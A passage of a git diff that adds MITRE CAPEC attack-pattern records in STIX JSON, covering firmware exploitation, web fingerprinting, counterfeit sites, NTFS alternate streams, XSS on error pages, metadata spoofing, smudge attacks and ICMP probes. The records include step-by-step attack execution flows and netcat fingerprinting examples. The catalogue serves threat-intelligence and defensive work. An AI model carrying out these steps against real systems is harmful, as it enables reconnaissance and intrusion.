", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Target server software must be a HTTP server that performs web logging." + ], + "x_capec_resources_required": [ + "Ability to send specially formatted HTTP request to web server" + ], + "x_capec_skills_required": { + "Low": "To input faked entries into Web logs" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37.json new file mode 100644 index 0000000000000000000000000000000000000000..b459fc6f6803ebd5c3d532833fbc7796a1170b1b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37.json @@ -0,0 +1,100 @@ +{ + "id": "bundle--7f1a4701-aed1-46a5-931d-ee5f9b9b9711", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--0cd20b07-0159-46ed-bff1-cf0dfd0b5a37", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

    2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

    2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json new file mode 100644 index 0000000000000000000000000000000000000000..5ed3bf690559ffffaf5cd92c4b4c50e54959d6aa --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157.json @@ -0,0 +1,84 @@ +{ + "id": "bundle--a76fe39b-5a34-4425-bd5b-9ad0894b958f", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker sends a series of probes to a web application in order to elicit version-dependent and type-dependent behavior that assists in identifying the target. An attacker could learn information such as software versions, error pages, and response headers, variations in implementations of the HTTP protocol, directory structures, and other similar information about the targeted service. This information can then be used by an attacker to formulate a targeted attack plan. While web application fingerprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-170", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/170.html" + }, + { + "external_id": "CWE-497", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/497.html" + }, + { + "description": "Saumil Shah, An Introduction to HTTP fingerprinting", + "external_id": "REF-36", + "source_name": "reference_from_CAPEC", + "url": "http://www.net-square.com/httprint_paper.html" + }, + { + "description": "OWASP Web Security Testing Guide (v4 [DRAFT]), The Open Web Application Security Project (OWASP)", + "external_id": "REF-37", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework" + }, + { + "description": "HTTP 1.1 Specification (RFC 2616), IETF RFC", + "external_id": "REF-38", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc2616.txt" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-39", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/Fingerprinting" + } + ], + "id": "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Web Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other (Information Leakage)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker sends malformed requests or requests of nonexistent pages to the server. Consider the following HTTP responses.\n Response from Apache 1.3.23\n $ nc apache.server.com80 GET / HTTP/3.0\n HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12: 37 GMTServer: Apache/1.3.23Connection: closeTransfer: chunkedContent-Type: text/HTML; charset=iso-8859-1\n Response from IIS 5.0\n $ nc iis.server.com 80GET / HTTP/3.0\n HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14: 02 GMTContent-Type: text/HTMLAccept-Ranges: bytes Last-Modified: Fri, 01 Jan 1999 20:14: 02 GMTETag: W/e0d362a4c335be1: ae1Content-Length: 133\n [REF-37]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Request fingerprinting: Use automated tools or send web server specific commands to web server and wait for server's response.

    2. Techniques
    Use automated tools or send web server specific commands to web server and then receive server's response.

Experiment

  1. Increase the accuracy of server fingerprinting of Web servers: Attacker usually needs to send several different commands to accurately identify the web server. Attacker can also use automated tools to send requests to the server. The responses of the server may be different in terms of protocol behavior.

    2. Techniques
    Observe the ordering of the several HTTP response headers. The ordering of the header of each server may have unique identities.
    Send bad requests or requests of nonexistent pages to the server.
    Attacker takes existing automated tools to recognize the type and the version of the web server in use.

  2. Identify Web Application Software: After the web server platform software has been identified, the attacker start to identify web application technologies such as ASP, .NET, PHP and Java on the server.

    3. Techniques
    Examine the file name extensions in URL, for example .php indicates PHP script interfaced with Apache server.
    Examine the HTTP Response Headers. This may leak information about software signatures
    Examine Cookies that may contain server's software information.
    Check error pages.

  3. Identify Backend Database Version: Determining the database engine type can assist attackers' attempt to successfully execute SQL injection. Some database API such as ODBC will show a database type as part of the driver information when reporting an error.

    4. Techniques
    Use tools to send bogus SQL query to the server and check error pages.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Any web application can be fingerprinted. However, some configuration choices can limit the useful information an attacker may collect during a fingerprinting attack." + ], + "x_capec_resources_required": [ + "While simple fingerprinting can be accomplished with only a web browser, for more thorough fingerprinting an attacker requires a variety of tools to collect information about the target. These tools might include protocol analyzers, web-site crawlers, and fuzzing tools. Footprinting a service adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Low": "Attacker knows how to send HTTP request, SQL query to a web application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json new file mode 100644 index 0000000000000000000000000000000000000000..74ce39b933f2ead0e19f707821ed19ba1a75dab5 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067.json @@ -0,0 +1,55 @@ +{ + "id": "bundle--4655b4b6-e681-4f04-a233-beb20ba9bf87", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json new file mode 100644 index 0000000000000000000000000000000000000000..215b73098d21985d36d901962de1d672c3849436 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112.json @@ -0,0 +1,57 @@ +{ + "id": "bundle--f71cf2c6-d5bd-4e43-993f-97d5ae306770", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of Microsoft NTFS Alternate Data Streams (ADS) to undermine system security. ADS allows multiple \"files\" to be stored in one directory entry referenced as filename:streamname. One or more alternate data streams may be stored in any file or directory. Normal Microsoft utilities do not show the presence of an ADS stream attached to a file. The additional space for the ADS is not recorded in the displayed file size. The additional space for ADS is accounted for in the used space on the volume. An ADS can be any type of file. ADS are copied by standard Microsoft utilities between NTFS volumes. ADS can be used by an attacker or intruder to hide tools, scripts, and data from detection by normal system utilities. Many anti-virus programs do not check for or scan ADS. Windows Vista does have a switch (-R) on the command line DIR command that will display alternate streams.", + "external_references": [ + { + "external_id": "CAPEC-168", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/168.html" + }, + { + "external_id": "CWE-212", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/212.html" + }, + { + "external_id": "CWE-69", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/69.html" + }, + { + "description": "Windows alternate data stream", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Windows_alternate_data_stream" + } + ], + "id": "attack-pattern--0d2d1e18-6e28-4c58-b442-c5450e6c1112", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Windows ::DATA Alternate Data Stream", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must be running the Microsoft NTFS file system." + ], + "x_capec_resources_required": [ + "The attacker must have command line or programmatic access to the target's files system with write/read permissions." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json new file mode 100644 index 0000000000000000000000000000000000000000..f5a2d86e3557c1e12dc58f3f702507d9afe71df2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2.json @@ -0,0 +1,54 @@ +{ + "id": "bundle--90216c3a-8ce9-4fad-b81c-4f7714af9d48", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary distributes a link (or possibly some other query structure) with a request to a third party web server that is malformed and also contains a block of exploit code in order to have the exploit become live code in the resulting error page.", + "external_references": [ + { + "external_id": "CAPEC-198", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/198.html" + }, + { + "external_id": "CWE-81", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/81.html" + } + ], + "id": "attack-pattern--0e2bf24b-2931-45aa-a0e9-22eccfb310b2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Targeting Error Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b" + ], + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs as URL parameters: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application, looking for URLs which use parameters.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Cause application to return error page: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and injects various common script payloads and special characters into the parameters to see if an error page occurs, and if the injected payload is executed by the error page.

    2. Techniques
    Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
    Use a list of HTML special characters to inject into parameters of known URLs and check if they caused errors

  2. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS through an error page, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

    3. Techniques
    Change a URL parameter to include a malicious script tag.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

    2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_extended_description": "\n When the third party web server receives the crafted request and notes the error it then creates an error message that echoes the malformed message, including the exploit. Doing this converts the exploit portion of the message into to valid language elements that are executed by the viewing browser. When a victim executes the query provided by the adversary the infected error message is returned including the exploit code which then runs in the victim's browser. XSS can result in execution of code as well as data leakage (e.g. session cookies can be sent to the attacker). This type of attack is especially dangerous since the exploit appears to come from the third party web server, who the victim may trust and hence be more vulnerable to deception.\n ", + "x_capec_prerequisites": [ + "A third party web server which fails to adequately sanitize messages sent in error pages.", + "The victim must be made to execute a query crafted by the adversary which results in the infected error report." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe.json new file mode 100644 index 0000000000000000000000000000000000000000..6db39add7d2bcc62f66635d54030aae393e383d8 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe.json @@ -0,0 +1,60 @@ +{ + "id": "bundle--45d9f488-0c48-4ce1-8f46-f049aca88ab6", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.\n ", + "external_references": [ + { + "external_id": "CAPEC-690", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/690.html" + } + ], + "id": "attack-pattern--0e5c8f31-5099-41ae-a6b8-f6d0434970fe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Metadata Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_extended_description": "\n One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. Adversaries may spoof a variety of metadata across a number of resources, such as the following:\n \n Authors of Version Control System (VCS) repository commits\n Open source package statistics\n File attributes, such as when a file was last update\n \n The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--6ed35753-d365-4be2-a044-2fcc6e191b5a" + ], + "x_capec_prerequisites": [ + "Identification of a resource whose metadata is to be spoofed" + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of metadata to convince victims the source is trusted" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json new file mode 100644 index 0000000000000000000000000000000000000000..2ee9637532ed5172af392558714158d7bfa0ebad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459.json @@ -0,0 +1,46 @@ +{ + "id": "bundle--2b2dfb98-5c8c-4bcb-b4fa-cfc923ddad20", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user’s fingers.", + "external_references": [ + { + "external_id": "CAPEC-626", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/626.html" + } + ], + "id": "attack-pattern--0fda524b-2218-4aec-bf3e-6f345d13e459", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Smudge Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_prerequisites": [ + "The attacker must have physical access to the device." + ], + "x_capec_skills_required": { + "Medium": "The attacker must know how to make use of these smudges." + }, + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json new file mode 100644 index 0000000000000000000000000000000000000000..878c15f706158dd60a1b77d1a7de508ff5a7c25a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247.json @@ -0,0 +1,87 @@ +{ + "id": "bundle--302a5fed-7497-4fd8-a269-1aaea8b4ddf2", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a technique to generate an ICMP Error message (Port Unreachable, Destination Unreachable, Redirect, Source Quench, Time Exceeded, Parameter Problem) from a target and then analyze the amount of data returned or \"Quoted\" from the originating request that generated the ICMP error message.", + "external_references": [ + { + "external_id": "CAPEC-329", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/329.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-123", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc792.html" + }, + { + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "external_id": "REF-124", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc1122.html" + }, + { + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "external_id": "REF-262", + "source_name": "reference_from_CAPEC", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf" + } + ], + "id": "attack-pattern--1059e91f-43ff-4a00-bc74-4110979f5247", + "modified": "2022-02-22T00:00:00.000Z", + "name": "ICMP Error Message Quoting Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For this purpose \"Port Unreachable\" error messages are often used, as generating them requires the adversary to send a UDP datagram to a closed port on the target. The goal of this analysis to make inferences about the type of operating system or firmware that sent the error message in reply.\n This is useful for identifying unique characteristics of operating systems because the RFC-1122 expected behavior reads: \"Every ICMP error message includes the Internet header and at least the first 8 data octets of the datagram that triggered the error; more than 8 octets MAY be sent [...].\" This contrasts with RFC-792 expected behavior, which limited the quoted text to 64 bits (8 octets). Given the latitude in the specification the resulting RFC-1122 stack implementations often respond with a high degree of variability in the amount of data quoted in the error message because \"older\" or \"legacy\" stacks may comply with the RFC-792 specification, while other stacks may choose a longer format in accordance with RFC-1122. As a general rule most operating systems or firmware will quote the first 8 bytes of the datagram triggering the error, but some IP stacks will quote more than the first 8 bytes of data.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git 